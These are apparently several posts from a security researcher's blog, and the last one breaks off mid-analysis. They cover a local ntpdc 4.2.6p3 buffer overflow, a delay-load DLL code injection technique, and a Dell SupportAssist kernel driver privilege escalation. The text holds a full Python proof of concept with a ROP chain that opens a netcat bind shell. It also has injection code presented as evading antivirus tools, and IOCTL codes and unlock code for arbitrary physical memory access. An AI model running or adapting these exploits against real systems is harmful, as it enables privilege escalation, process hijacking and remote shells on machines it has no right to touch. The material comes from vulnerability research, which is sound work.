These are environment variables passed into the application and located on the program stack. Using the ROP gadget ADD ESP, 0x256c, followed by a series of register POPs, we could land here. Controlling this is easy with the help of LD_PRELOAD, a neat trick documented by Dan Rosenberg in 2010. By exporting LD_PRELOAD, we can control uninitialized data located on the stack, as follows:

$ export LD_PRELOAD=`python -c 'print "A"*10000'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[..snip..]
gdb-peda$ x/10wx $esp+0x256c
0xbfffedc8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffedd8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffede8: 0x41414141  0x41414141
gdb-peda$ 

Using some pattern_create/offset magic, we can find the offset in our LD_PRELOAD string and take control over EIP and the stack:

$ export LD_PRELOAD=`python -c 'print "A"*8490 + "AAAA" + "BBBB"'`
$ python -c "print 'A'*485 + '\xe0\x43\x01\x80' + 'A'*79 + '\x8d\x67\x02\x80' + 'B'*600" > input.file
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x13560 
EDX: 0x42424242 ('BBBB')
ESI: 0x41414141 ('AAAA')
EDI: 0x41414141 ('AAAA')
EBP: 0x41414141 ('AAAA')
ESP: 0xbffff3bc ("BBBB")
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xbffff3bc ("BBBB")
0004| 0xbffff3c0 --> 0x4e495700 ('')
0008| 0xbffff3c4 ("DOWID=69206020")
0012| 0xbffff3c8 ("D=69206020")
0016| 0xbffff3cc ("206020")
0020| 0xbffff3d0 --> 0x47003032 ('20')
0024| 0xbffff3d4 ("NOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
0028| 0xbffff3d8 ("_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

This gives us EIP, control over the stack, and control over a decent number of registers; however, the LD_PRELOAD trick is extremely sensitive to stack shifting, which represents a pretty big problem for exploit portability. For now, I’m going to forget about it; chances are we could brute force the offset, if necessary, or simply invoke the application with env -i.

From here, we need to figure out a ROP payload. The easiest payload I can think of is a simple ret2libc. Unfortunately, ASCII armor ensures the libc addresses all contain null bytes:

gdb-peda$ vmmap

0x00327000 0x004cb000 r-xp /lib/i386-linux-gnu/libc-2.15.so
0x004cb000 0x004cd000 r--p /lib/i386-linux-gnu/libc-2.15.so
0x004cd000 0x004ce000 rw-p /lib/i386-linux-gnu/libc-2.15.so
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x366060 <system>
gdb-peda$ 

One idea I had was to simply construct the address in a register, then call it. Using ROPgadget, I hunted for ADD/SUB instructions that modified any registers we controlled. Eventually, I discovered this gem:

0x800138f2: add edi, esi; ret 0;
0x80022073: call edi

Using the above, we could pop controlled, non-null values into ESI/EDI that, when added, equal 0x366060 <system>. Many values will work, but I chose 0xeeffffff + 0x11366061:
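
The math works because the add wraps at 32 bits; a quick sanity check in Python:

# 0xeeffffff + 0x11366061 = 0x100366060; the carry falls out of 32-bit EDI
print(hex((0xeeffffff + 0x11366061) & 0xffffffff))  # 0x366060 -> &system

With the values popped and the chain about to return into the ADD gadget: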

EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x12f00 
EDX: 0x42424242 ('BBBB')
ESI: 0xeeffffff 
EDI: 0x11366061 
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
EIP: 0x800143ea (ret)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
=> 0x800143ea: ret    
   0x800143eb: nop
   0x800143ec: lea    esi,[esi+eiz*1+0x0]
   0x800143f0: mov    DWORD PTR [esp],ebp
   0x800143f3: call   0x80018d20
[------------------------------------stack-------------------------------------]
0000| 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
0004| 0xbfffefbc --> 0x80022073 --> 0xd7ff 
0008| 0xbfffefc0 ('C' <repeats 200 times>...)
0012| 0xbfffefc4 ('C' <repeats 200 times>...)
0016| 0xbfffefc8 ('C' <repeats 200 times>...)
0020| 0xbfffefcc ('C' <repeats 200 times>...)
0024| 0xbfffefd0 ('C' <repeats 200 times>...)
0028| 0xbfffefd4 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x800143ea in ?? ()

As shown above, we’ve got our two values in EDI/ESI and are returning to our ADD EDI, ESI gadget. Once this completes, we return to our CALL EDI gadget, which will jump into system:

EDI: 0x366060 (<system>:   sub    esp,0x1c)
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefc0 --> 0xbffff60d ("/bin/nc -lp 5544 -e /bin/sh")
EIP: 0x80022073 --> 0xd7ff
EFLAGS: 0x217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x80022073: call   edi

Recall the format of a ret2libc: [system() address | exit() | shell command]; therefore, we need to stick a bogus exit address (in my case, junk) as well as the address of a command. Also remember, however, that CALL EDI is essentially a macro for PUSH EIP+2 ; JMP EDI. This means that our stack will be tainted with the address @ EIP+2. Thanks to this, we don’t really need to add an exit address, as one will be added for us. There are, unfortunately, no JMP EDI gadgets in the binary, so we’re stuck with a messy exit.

This culminates in:

$ export LD_PRELOAD=`python -c 'print "A"*8472 + "\xff\xff\xff\xee" + "\x61\x60\x36\x11" + "AAAA" + "\xf2\x38\x01\x80" + "\x73\x20\x02\x80" + "\x0d\xf6\xff\xbf" + "C"*1492'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[snip all the LD_PRELOAD crap]
[New process 31184]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
process 31184 is executing new program: /bin/dash
[New process 31185]
process 31185 is executing new program: /bin/nc.traditional

Success! Though this is a very dirty hack, and makes no claim of portability, it works. As noted previously, we can brute force the image base and stack offsets, though we can also execute the binary with an empty environment and no stack tampering with env -i, giving us a much higher chance of hitting our mark.

Overall, this was quite a bit of fun. Although ASLR/PIE still poses an issue, this is a local bug, and there’s nothing here that brute forcing and a little investigation can’t take care of. NX/RELRO/Canary/SSP/ASCII armor have all been successfully neutralized. I hacked up a PoC that should work on Ubuntu boxes as configured, but it brute forces offsets. Test runs show it can take up to 2 hours to successfully pop a box. Full code can be found below.

from os import system, environ
from struct import pack
import sys

#
# ntpdc 4.2.6p3 bof
# @dronesec
# tested on x86 Ubuntu 12.04.5 LTS
#

IMAGE_BASE = 0x80000000
LD_INITIAL_OFFSET = 8900
LD_TAIL_OFFSET = 1400

sploit = "\x41" * 485        # junk 
sploit += pack("<I", IMAGE_BASE + 0x000143e0) # eip
sploit += "\x41" * 79        # junk 
sploit += pack("<I", IMAGE_BASE + 0x0002678d) # location -0x14/-0x318 from shellcode

ld_pl = ""
ld_pl += pack("<I", 0xeeffffff) # ESI
ld_pl += pack("<I", 0x11366061) # EDI
ld_pl += pack("<I", 0x41414141) # EBP
ld_pl += pack("<I", IMAGE_BASE + 0x000138f2) # ADD EDI, ESI; RET
ld_pl += pack("<I", IMAGE_BASE + 0x00022073) # CALL EDI
ld_pl += pack("<I", 0xbffff60d) # payload addr based on empty env; probably wrong

environ["EGG"] = "/bin/nc -lp 5544 -e /bin/sh"

for idx in xrange(200):

    for inc in xrange(200):

        # rebuild the payload each attempt so the padding does not accumulate
        # across iterations; leading filler comes before the ROP values and
        # trailing filler after, mirroring the manual exploit
        attempt = "\x41" * (LD_INITIAL_OFFSET + idx)
        attempt += ld_pl
        attempt += "\x43" * (LD_TAIL_OFFSET + inc)

        environ["LD_PRELOAD"] = attempt
        system("echo %s | ntpdc 2>&1" % sploit)

Abusing Token Privileges for EoP

1 September 2017 at 21:00

This is just a placeholder post to link off to the paper Stephen Breen and I wrote on abusing token privileges. You can read the entire paper here[0]. I also recommend checking out the blog post he posted on Foxglove here[1].

[0] https://raw.githubusercontent.com/hatRiot/token-priv/master/abusing_token_eop_1.0.txt
[1] https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

Abusing delay load DLLs for remote code injection

19 September 2017 at 21:00

I always tell myself that I’ll try posting more frequently on my blog, and yet here I am, two years later. Perhaps this post will provide the necessary motivation to conduct more public research. I do love it.

This post details a novel remote code injection technique I discovered while playing around with delay loading DLLs. It allows for the injection of arbitrary code into arbitrary remote, running processes, provided that they implement the abused functionality. To make it abundantly clear, this is not an exploit, it’s simply another strategy for migrating into other processes.

Modern code injection techniques typically rely on a variation of two different win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a great article[0] detailing ten various methods of process injection. While not all of them allow for injection into remote processes, particularly those already running, it does detail the most common, public variations. This strategy is more akin to inline hooking, though we’re not touching the IAT and we don’t require our code to already be in the process. There are no calls to NtQueueApc or CreateRemoteThread, and no need for thread or process suspension. There are some limitations, as with anything, which I’ll detail below.

Delay Load DLL

Delay loading is a linker strategy that allows for the lazy loading of DLLs. Executables commonly load all necessary dynamically linked libraries at runtime and perform the IAT fix-ups then. Delay loading, however, allows for these libraries to be lazy loaded at call time, supported by a pseudo IAT that’s fixed-up on first call. This process can be better illuminated by the following, decades old figure below:

This image comes from a great Microsoft article released in 1998 [1] that describes the strategy quite well, but I’ll attempt to distill it here.

Portable executables contain a data directory named IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports or using windbg. The structure of this entry is described in delayhlp.cpp, included with the WinSDK:

struct InternalImgDelayDescr {
    DWORD           grAttrs;        // attributes
    LPCSTR          szName;         // pointer to dll name
    HMODULE *       phmod;          // address of module handle
    PImgThunkData   pIAT;           // address of the IAT
    PCImgThunkData  pINT;           // address of the INT
    PCImgThunkData  pBoundIAT;      // address of the optional bound IAT
    PCImgThunkData  pUnloadIAT;     // address of optional copy of original IAT
    DWORD           dwTimeStamp;    // 0 if not bound,
                                    // O.W. date/time stamp of DLL bound to (Old BIND)
    };

The table itself contains RVAs, not pointers. We can find the delay directory offset by parsing the file header:

0:022> lm m explorer
start    end        module name
00690000 00969000   explorer   (pdb symbols)          
0:022> !dh 00690000 -f

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES

[...] 

   68A80 [      40] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
    1000 [     D98] address [size] of Import Address Table Directory
   AC670 [     140] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory

The first entry and it’s delay linked DLL can be seen in the following:

0:022> dd 00690000+ac670 l8
0073c670  00000001 000ac7b0 000b24d8 000b1000
0073c680  000ac8cc 00000000 00000000 00000000
0:022> da 00690000+000ac7b0 
0073c7b0  "WINMM.dll"

This means that WINMM is dynamically linked to explorer.exe, but delay loaded, and will not be loaded into the process until the imported function is invoked. Once loaded, a helper function fixes up the pseudo IAT by using GetProcAddress to locate the desired function and patching the table at runtime.

The pseudo IAT referenced is separate from the standard PE IAT; this IAT is specifically for the delay load functions, and is referenced from the delay descriptor. So for example, in WINMM.dll’s case, the pseudo IAT for WINMM is at RVA 000b1000. The second delay descriptor entry would have a separate RVA for its pseudo IAT, and so on and so forth.
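
You don’t need a debugger to enumerate these; the pefile Python module parses the delay import directory for you. A quick sketch (attribute names per pefile’s delay import support, which I believe mirror its regular import API):

import pefile

pe = pefile.PE(r"C:\Windows\explorer.exe")
for entry in getattr(pe, "DIRECTORY_ENTRY_DELAY_IMPORT", []):
    print(entry.dll.decode())
    for imp in entry.imports:
        print("  {0}".format(imp.name.decode() if imp.name else "ordinal %d" % imp.ordinal))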

Using WINMM as our delay example, explorer imports one function from it, PlaySoundW. In my particular running instance, it has not been invoked, so the pseudo IAT has not been fixed up yet. We can see this by dumping its pseudo IAT entry:

0:022> dps 00690000+000b1000 l2
00741000  006dd0ac explorer!_imp_load__PlaySoundW
00741004  00000000

Each DLL entry is null terminated. The above pointer shows us that the existing entry is merely a springboard thunk within the Explorer process. This takes us here:

0:022> u explorer!_imp_load__PlaySoundW
explorer!_imp_load__PlaySoundW:
006dd0ac b800107400      mov     eax,offset explorer!_imp__PlaySoundW (00741000)
006dd0b1 eb00            jmp     explorer!_tailMerge_WINMM_dll (006dd0b3)
explorer!_tailMerge_WINMM_dll:
006dd0b3 51              push    ecx
006dd0b4 52              push    edx
006dd0b5 50              push    eax
006dd0b6 6870c67300      push    offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670)
006dd0bb e8296cfdff      call    explorer!__delayLoadHelper2 (006b3ce9)

The tailMerge function is a linker-generated stub that’s compiled in per-DLL, not per function. The __delayLoadHelper2 function is the magic that handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp, this function handles calling LoadLibrary/GetProcAddress and patching the pseudo IAT. As a demonstration of how this looks, I compiled a binary that delay links dnslib. Here’s the process of resolution of DnsAcquireContextHandle:

0:000> dps 00060000+0001839c l2
0007839c  000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W
000783a0  00000000
0:000> bp DelayTest!__delayLoadHelper2
0:000> g
ModLoad: 753e0000 7542c000   C:\Windows\system32\apphelp.dll
Breakpoint 0 hit
[...]
0:000> dd esp+4 l1
0024f9f4  00075ffc
0:000> dd 00075ffc l4
00075ffc  00000001 00010fb0 000183c8 0001839c
0:000> da 00060000+00010fb0 
00070fb0  "DNSAPI.dll"
0:000> pt
0:000> dps 00060000+0001839c l2
0007839c  74dfd0fc DNSAPI!DnsAcquireContextHandle_W
000783a0  00000000

Now the pseudo IAT entry has been patched up and the correct function is invoked on subsequent calls. This has the additional side effect of leaving the pseudo IAT as both executable and writable:

0:011> !vprot 00060000+0001839c
BaseAddress:       00371000
AllocationBase:    00060000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY

At this point, the DLL has been loaded into the process and the pseudo IAT patched up. In another twist, not all functions are resolved on load, only the one that is invoked. This leaves certain entries in the pseudo IAT in a mixed state:

00741044  00726afa explorer!_imp_load__UnInitProcessPriv
00741048  7467f845 DUI70!InitThread
0074104c  00726b0f explorer!_imp_load__UnInitThread
00741050  74670728 DUI70!InitProcessPriv
0:022> lm m DUI70
start    end        module name
74630000 746e2000   DUI70      (pdb symbols)

In the above, two of the four functions are resolved and the DUI70.dll library is loaded into the process. In each entry of the delay load descriptor, the structure referenced above maintains an RVA to the HMODULE. If the module isn’t loaded, it will be null. So when a delayed function is invoked that’s already loaded, the delay helper function will check its entry to determine if a handle to it can be used:

HMODULE hmod = *idd.phmod;
    if (hmod == 0) {
        if (__pfnDliNotifyHook2) {
            hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
            }
        if (hmod == 0) {
            hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
            }

The idd structure is just an instance of the InternalImgDelayDescr described above, passed into the __delayLoadHelper2 function from the linker tailMerge stub. So if the module is already loaded, as referenced from the delay entry, then it uses that handle instead. It does NOT attempt to LoadLibrary regardless of this value; this can be used to our advantage.

Another note here is that the delay loader supports notification hooks. There are six states we can hook into: processing start, pre load library, fail load library, pre GetProcAddress, fail GetProcAddress, and end processing. You can see how the hooks are used in the above code sample.

Finally, in addition to delay loading, the portable executable also supports delay library unloading. It works pretty much how you’d expect it, so we won’t be touching on it here.

Limitations

Before detailing how we might abuse this (though it should be fairly obvious), it’s important to note the limitations of this technique. It is not completely portable, and using pure delay load functionality it cannot be made to be so.

The glaring limitation is that the technique requires the remote process to be delay linked. A brief crawl of some local processes on my host shows that many Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft applications are as well, including Chrome. It is additionally a well-supported function of the portable executable, and exists today on modern systems.

Another limitation is that, because at its core it relies on LoadLibrary, there must exist a DLL on disk. There is no way to LoadLibrary from memory (unless you use one of the countless techniques to do that, none of which use LoadLibrary…).

In addition to implementing the delay load, the remote process must implement functionality that can be triggered. Instead of doing a CreateRemoteThread, SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and thus we must be able to trigger the remote process into performing this action/executing this function. This is generally pretty easy if you’re using the suspended process/new process strategy, but may not be trivial on running applications.

Finally, any process that does not allow unsigned libraries to be loaded will block this technique. This is controlled by ProcessSignaturePolicy and can be set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using this at the moment, but Microsoft Edge was one of the first big products to be employing this policy. This technique is also impacted by the ProcessImageLoadPolicy policy, which can be set to restrict loading of images from a UNC share.

Abuse

When discussing an ability to inject code into a process, there are three separate cases an attacker may consider, and some additional edge situations within remote processes. Local process injection is simply the execution of shellcode/arbitrary code within the current process. Suspended process is the act of spawning a new, suspended process from an existing, controlled one and injecting code into it. This is a fairly common strategy to employ for migrating code, setting up backup connections, or establishing a known process state prior to injection. The final case is the running remote process.

The running remote process is an interesting case with several caveats that we’ll explore below. I won’t detail suspended processes, as it’s essentially the same as a running process, but easier. It’s easier because many applications actually just load the delay library at runtime, either because the functionality is environmentally keyed and required then, or because another loaded DLL is linked against it and requires it. Refer to the source code for the project for an implementation of suspended process injection [3].

Local Process

The local process is the most simple and arguably the most useless for this strategy. If we can inject and execute code in this manner, we might as well link against the library we want to use. It serves as a fine introduction to the topic, though.

The first thing we need to do is delay link the executable against something. For various reasons I originally chose dnsapi.dll. You can specify delay load DLLs via the linker options for Visual Studio.

With that, we need to obtain the RVA for the delay directory. This can be accomplished with the following function:

IMAGE_DELAYLOAD_DESCRIPTOR*
findDelayEntry(char *cDllName)
{
    PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
    PIMAGE_NT_HEADERS pImgNt = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew);
    PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos + 
            pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress);
    DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL);
    IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL;

    // iterate over entries 
    for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++){
        char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA);
        if (strcmp(_cDllName, cDllName) == 0){
            pImgResult = entry;
            break;
        }
    }

    return pImgResult;
}

Should be pretty clear what we’re doing here. Once we’ve got the correct table entry, we need to mark the entry’s DllName as writable, overwrite it with our custom DLL name, and restore the protection mask:

IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry("DNSAPI.dll");
DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect);
WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect);

Now all that’s left to do is trigger the targeted function. Once triggered, the delay helper function will snag the DllName from the table entry and load the DLL via LoadLibrary.

Remote Process

The most interesting of cases is the running remote process. For demonstration here, we’ll be targeting explorer.exe, as we can almost always rely on it to be running on a workstation under the current user.

With an open handle to the explorer process, we must perform the same searching tasks as we did for the local process, but this time in a remote process. This is a little more cumbersome, but the code can be found in the project repository for reference[3]. We simply grab the remote PEB, parse the image and its directories, and locate the appropriate delay entry we’re targeting.

This part is likely to prove the most unfriendly when attempting to port this to another process; what functionality are we targeting? What function or delay load entry is generally unused, but triggerable from the current session? With explorer there are several options; it’s delay linked against 9 different DLLs, each averaging 2-3 imported functions. Thankfully one of the first functions I looked at was pretty straightforward: CM_Request_Eject_PC. This function, exported by CFGMGR32.dll, requests that the system be ejected from the local docking station[4]. We can therefore assume that it’s likely to be available and not fixed on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected.

When we request that the workstation be ejected from the docking station, the function sends a PNP request. We use the IShellDispatch object to execute this, which is accessed via Shell, handled by, you guessed it, explorer.

The code for this is pretty simple:

HRESULT hResult = S_FALSE;
IShellDispatch *pIShellDispatch = NULL;

CoInitialize(NULL);

hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, 
                           IID_IShellDispatch, (void**)&pIShellDispatch);
if (SUCCEEDED(hResult))
{
    pIShellDispatch->EjectPC();
    pIShellDispatch->Release();
}

CoUninitialize();

Our DLL only needs to export CM_Request_Eject_PC for us to not crash the process; we can either pass on the request to the real DLL, or simply ignore it. This leads us to stable and reliable remote code injection.

Remote Process – All Fixed

One interesting edge case is a remote process that you want to inject into via delay loading, but all imported functions have been resolved in the pseudo IAT. This is a little more complicated, but all hope is not lost.

Remember when I mentioned earlier that a handle to the delay load library is maintained in its descriptor? This is the value that the helper function checks for to determine if it should reload the module or not; if it’s null, it attempts to load it, if it’s not, it uses that handle. We can abuse this check by nulling out the module handle, thereby "tricking" the helper function into once again loading that descriptor’s DLL.

In the discussed case, however, the pseudo IAT is all patched up; no more trampolines into the delay load helper function. Helpfully, the pseudo IAT is writable by default, so we can simply patch in the trampoline function ourselves and have it instantiate the descriptor all over again. In short, this worst-case strategy requires three separate WriteProcessMemory calls: one to null out the module handle, one to overwrite the pseudo IAT entry, and one to overwrite the loaded DLL name.
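
In ctypes pseudo-Python, the worst case looks roughly like this; pid, the tailMerge thunk address tramp_addr, and the three target addresses (hmod_addr, iat_entry_addr, dllname_addr) are assumptions resolved by walking the remote PEB as described above:

import ctypes, struct

k32 = ctypes.windll.kernel32
h = k32.OpenProcess(0x1F0FFF, False, pid)  # PROCESS_ALL_ACCESS

def wpm(addr, data):
    # thin WriteProcessMemory wrapper
    n = ctypes.c_size_t(0)
    if not k32.WriteProcessMemory(h, ctypes.c_void_p(addr), data, len(data), ctypes.byref(n)):
        raise ctypes.WinError()

wpm(hmod_addr, b"\x00" * 8)                         # 1: null the cached HMODULE (x64)
wpm(iat_entry_addr, struct.pack("<Q", tramp_addr))  # 2: re-point the pseudo IAT at the tailMerge stub
wpm(dllname_addr, b"C:\\Windows\\Temp\\TestDLL.dll\x00")  # 3: swap in our DLL path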

Conclusions

I should make mention that I tested this strategy across several next gen AV/HIPS appliances, which will go unnamed here, and none were able to detect the cross process injection strategy. It would seem overall to be an interesting challenge at detection; in remote processes, the strategy uses the following chain of calls:

OpenProcess(..);

ReadRemoteProcess(..); // read image
ReadRemoteProcess(..); // read delay table 
ReadRemoteProcess(..); // read delay entry 1...n

VirtualProtectEx(..);
WriteRemoteProcess(..);

That’s it. The trigger functionality would be dynamic among each process, and the loaded library would be loaded via supported and well-known Windows facilities. I checked out a few other core Windows applications, and they all have pretty straightforward trigger strategies.

The referenced project[3] includes both x86 and x64 support, and has been tested across Windows 7, 8.1, and 10. It includes three functions of interest: inject_local, inject_suspended, and inject_explorer. It expects to find the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed. Note that it isn’t production quality; beware, here be dragons.

Special thanks to Stephen Breen for reviewing this post

References

[0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
[1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx
[2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx
[3] https://github.com/hatRiot/DelayLoadInject
[4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx

Dell SupportAssist Driver - Local Privilege Escalation

18 May 2018 at 04:00

This post details a local privilege escalation (LPE) vulnerability I found in Dell’s SupportAssist[0] tool. The bug is in a kernel driver loaded by the tool, and is pretty similar to bugs found by ReWolf in ntiolib.sys/winio.sys[1], and those found by others in ASMMAP/ASMMAP64[2]. These bugs are pretty interesting because they can be used to bypass driver signature enforcement (DSE) ad infinitum, or at least until they’re no longer compatible with newer operating systems.

Dell’s SupportAssist is, according to the site, "(..) now preinstalled on most of all new Dell devices running Windows operating system (..)". Its primary purpose is to troubleshoot issues and provide support capabilities both to the user and to Dell. There’s quite a lot of functionality in this software itself, which I spent quite a bit of time reversing and may blog about at a later date.

Bug

Calling this a "bug" is really a misnomer; the driver exposes this functionality eagerly. It actually exposes a lot of functionality, much like some of the previously mentioned drivers. It provides capabilities for reading and writing the model-specific register (MSR), resetting the 1394 bus, and reading/writing CMOS.

The driver is first loaded when the SupportAssist tool is launched, and the filename is pcdsrvc_x64.pkms on x64 and pcdsrvc.pkms on x86. Incidentally, this driver isn’t actually even built by Dell, but rather another company, PC-Doctor[3]. This company provides β€œsystem health solutions” to a variety of companies, including Dell, Intel, Yokogawa, IBM, and others. Therefore, it’s highly likely that this driver can be found in a variety of other products…

Once the driver is loaded, it exposes a symlink to the device at PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users on the system. This allows us to trigger one of the many IOCTLs exposed by the driver; approximately 30. I found a DLL used by the userland agent that served as an interface to the kernel driver and conveniently had symbol names available, allowing me to extract the following:

// 0x222004 = driver activation ioctl
// 0x222314 = IoDriver::writePortData
// 0x22230c = IoDriver::writePortData
// 0x222304 = IoDriver::writePortData
// 0x222300 = IoDriver::readPortData
// 0x222308 = IoDriver::readPortData
// 0x222310 = IoDriver::readPortData
// 0x222700 = EcDriver::readData
// 0x222704 = EcDriver::writeData
// 0x222080 = MemDriver::getPhysicalAddress
// 0x222084 = MemDriver::readPhysicalMemory
// 0x222088 = MemDriver::writePhysicalMemory
// 0x222180 = Msr::readMsr
// 0x222184 = Msr::writeMsr
// 0x222104 = PciDriver::readConfigSpace
// 0x222108 = PciDriver::writeConfigSpace
// 0x222110 = PciDriver::?
// 0x22210c = PciDriver::?
// 0x222380 = Port1394::doesControllerExist
// 0x222384 = Port1394::getControllerConfigRom
// 0x22238c = Port1394::getGenerationCount
// 0x222388 = Port1394::forceBusReset
// 0x222680 = SmbusDriver::genericRead
// 0x222318 = SystemDriver::readCmos8
// 0x22231c = SystemDriver::writeCmos8
// 0x222600 = SystemDriver::getDevicePdo
// 0x222604 = SystemDriver::getIntelFreqClockCounts
// 0x222608 = SystemDriver::getAcpiThermalZoneInfo

Immediately the MemDriver class jumps out. After some reversing, it appeared that these functions do exactly as expected: allow userland services to both read and write arbitrary physical addresses. There are a few quirks, however.

To start, the driver must first be β€œunlocked” in order for it to begin processing control codes. It’s unclear to me if this is some sort of hacky event trigger or whether the kernel developers truly believed this would inhibit malicious access. Either way, it’s goofy. To unlock the driver, a simple ioctl with the proper code must be sent. Once received, the driver will process control codes for the lifetime of the system.

To unlock the driver, we just execute the following:

BOOL bResult;
DWORD dwRet;
SIZE_T code = 0xA1B2C3D4, outBuf;

bResult = DeviceIoControl(hDriver, 0x222004, 
                          &code, sizeof(SIZE_T), 
                          &outBuf, sizeof(SIZE_T), 
                          &dwRet, NULL);

Once the driver receives this control code and validates the received code (0xA1B2C3D4), it sets a global flag and begins accepting all other control codes.
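
For reference, hDriver above is simply a handle to the device symlink mentioned earlier; a minimal sketch of opening it (no special privileges required):

HANDLE hDriver = CreateFileA("\\\\.\\PCDSRVC{3B54B31B-D06B6431-06020200}_0",
                             GENERIC_READ | GENERIC_WRITE,
                             FILE_SHARE_READ | FILE_SHARE_WRITE,
                             NULL, OPEN_EXISTING, 0, NULL);
if (hDriver == INVALID_HANDLE_VALUE)
    return -1; // the driver isn't loaded until SupportAssist is launched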

Exploitation

From here, we could exploit this the same way rewolf did[4]: read out physical memory looking for process pool tags, then traverse these until we identify our process as well as a SYSTEM process, then steal the token. However, PCD appears to give us a shortcut via the getPhysicalAddress ioctl. If this does indeed return the physical address of a given virtual address (VA), we can simply find the physical address of our VA and enable a couple token privileges[5] using the writePhysicalMemory ioctl.

Here’s how the getPhysicalAddress function works:

v5 = IoAllocateMdl(**(PVOID **)(a1 + 0x18), 1u, 0, 0, 0i64);
v6 = v5;
if ( !v5 )
  return 0xC0000001i64;
MmProbeAndLockPages(v5, 1, 0);
**(_QWORD **)(v3 + 0x18) = v4 & 0xFFF | ((_QWORD)v6[1].Next << 0xC);
MmUnlockPages(v6);
IoFreeMdl(v6);

Keen observers will spot the problem here; the MmProbeAndLockPages call is passing in UserMode for the KPROCESSOR_MODE, meaning we won’t be able to resolve any kernel mode VAs, only usermode addresses.

We can still read chunks of physical memory unabated, however, as the readPhysicalMemory function is quite simple:

if ( !DoWrite )
{
  memmove(a1, a2, a3);
  return 1;
}

They reuse a single function for reading and writing physical memory; we’ll return to that. For a number of reasons, I decided to take a different approach than rewolf, with great results.

Instead, I wanted to toggle on SeDebugPrivilege for my current process token. This would require finding the token in memory and writing a few bytes at a field offset. To do this, I used readPhysicalMemory to read chunks of memory of size 0x10000000 and checked for the first field in a _TOKEN, TokenSource. In a user token, this will be the string User32. Once we’ve identified this, we double check that we’ve found a token by validating the TokenLuid, which we can obtain from userland using the GetTokenInformation API.

In order to speed up the memory search, I only iterate over the addresses that match the token’s virtual address byte index. Essentially, when you convert a virtual address to a physical address (PA) the byte index, or the lower 12 bits, do not change. To demonstrate, assume we have a VA of 0xfffff8a001cc2060. Translating this to a physical address then:

kd> !pte  fffff8a001cc2060
                                           VA fffff8a001cc2060
